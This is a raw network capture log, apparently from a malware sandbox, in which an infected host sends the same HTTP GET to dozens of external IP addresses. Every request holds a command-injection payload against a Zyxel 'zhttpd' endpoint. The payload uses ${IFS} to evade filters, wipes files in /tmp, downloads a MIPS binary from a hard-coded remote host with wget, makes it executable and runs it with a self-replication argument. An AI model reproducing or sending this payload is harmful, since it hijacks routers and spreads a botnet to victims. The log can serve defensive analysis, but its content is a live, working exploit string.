                                            Feb 2, 2024 06:21:33.046549082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9545192.168.2.155816889.2.146.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046581030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9546192.168.2.1546142144.4.33.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046606064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9547192.168.2.155766814.232.15.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046641111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9548192.168.2.154832278.176.56.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046684980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9549192.168.2.1548556179.64.88.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046719074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9550192.168.2.154550276.47.46.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046753883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9551192.168.2.1559110129.79.94.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046821117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9552192.168.2.1545546147.105.216.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046823978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9553192.168.2.1540804148.131.185.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046894073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9554192.168.2.1540154144.244.157.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046941042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9555192.168.2.1547914148.71.228.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.046981096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9556192.168.2.154836862.83.220.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047020912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9557192.168.2.1537188126.167.28.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047051907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9558192.168.2.154143220.253.156.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047095060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9559192.168.2.1551120169.104.222.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047130108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9560192.168.2.1535808216.49.71.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047187090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9561192.168.2.1554842206.96.29.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047247887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9562192.168.2.153690637.227.126.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047322035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9563192.168.2.1542682110.248.48.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047355890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9564192.168.2.1533376162.94.216.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047369957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9565192.168.2.155675896.255.232.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047403097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9566192.168.2.1535200187.169.99.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047473907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9567192.168.2.153930867.111.24.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047508955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9568192.168.2.153734883.239.225.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047547102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9569192.168.2.1539916183.115.179.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047583103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9570192.168.2.1557910199.10.231.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047621012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9571192.168.2.1556252153.159.99.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047672033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9572192.168.2.1544892126.46.36.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047708988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9573192.168.2.1538338182.233.196.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047745943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9574192.168.2.1540616174.58.24.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047760963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9575192.168.2.155453834.89.138.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047806978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9576192.168.2.155008264.43.184.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047852039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9577192.168.2.155644067.77.34.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047878981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9578192.168.2.1552156177.167.80.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047915936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9579192.168.2.154129086.166.60.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047961950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9580192.168.2.1550282109.134.237.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.047979116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9581192.168.2.1544858146.188.183.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048046112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9582192.168.2.156076245.114.253.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048069954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9583192.168.2.155647648.46.97.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048127890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9584192.168.2.155791063.218.134.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048146009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9585192.168.2.1543508125.73.50.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048209906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9586192.168.2.153931680.47.136.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048245907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9587192.168.2.1544350156.163.232.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048268080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9588192.168.2.156045693.196.8.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048310041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9589192.168.2.1546208123.131.190.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048366070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9590192.168.2.154111295.103.186.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048424006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9591192.168.2.154806417.47.75.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048456907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9592192.168.2.1537050175.219.210.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048507929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9593192.168.2.1551408173.36.218.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048557043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9594192.168.2.1554406209.11.78.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048578024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9595192.168.2.1534406109.188.187.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048619986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9596192.168.2.15497829.195.218.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048660994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9597192.168.2.1536884218.181.196.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048707962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9598192.168.2.1547060180.182.95.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048744917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9599192.168.2.1551290141.199.48.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048795938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9600192.168.2.155198652.54.200.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048829079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9601192.168.2.1545650216.146.254.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048855066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9602192.168.2.1544976147.151.124.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048893929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9603192.168.2.1557030185.175.7.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048949003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9604192.168.2.155460684.80.135.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.048979044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9605192.168.2.1543080165.10.121.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049034119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9606192.168.2.1548526162.247.173.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049078941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9607192.168.2.1540382222.139.236.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049112082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9608192.168.2.1541106184.50.138.49443
                                            TimestampBytes transferredDirectionData
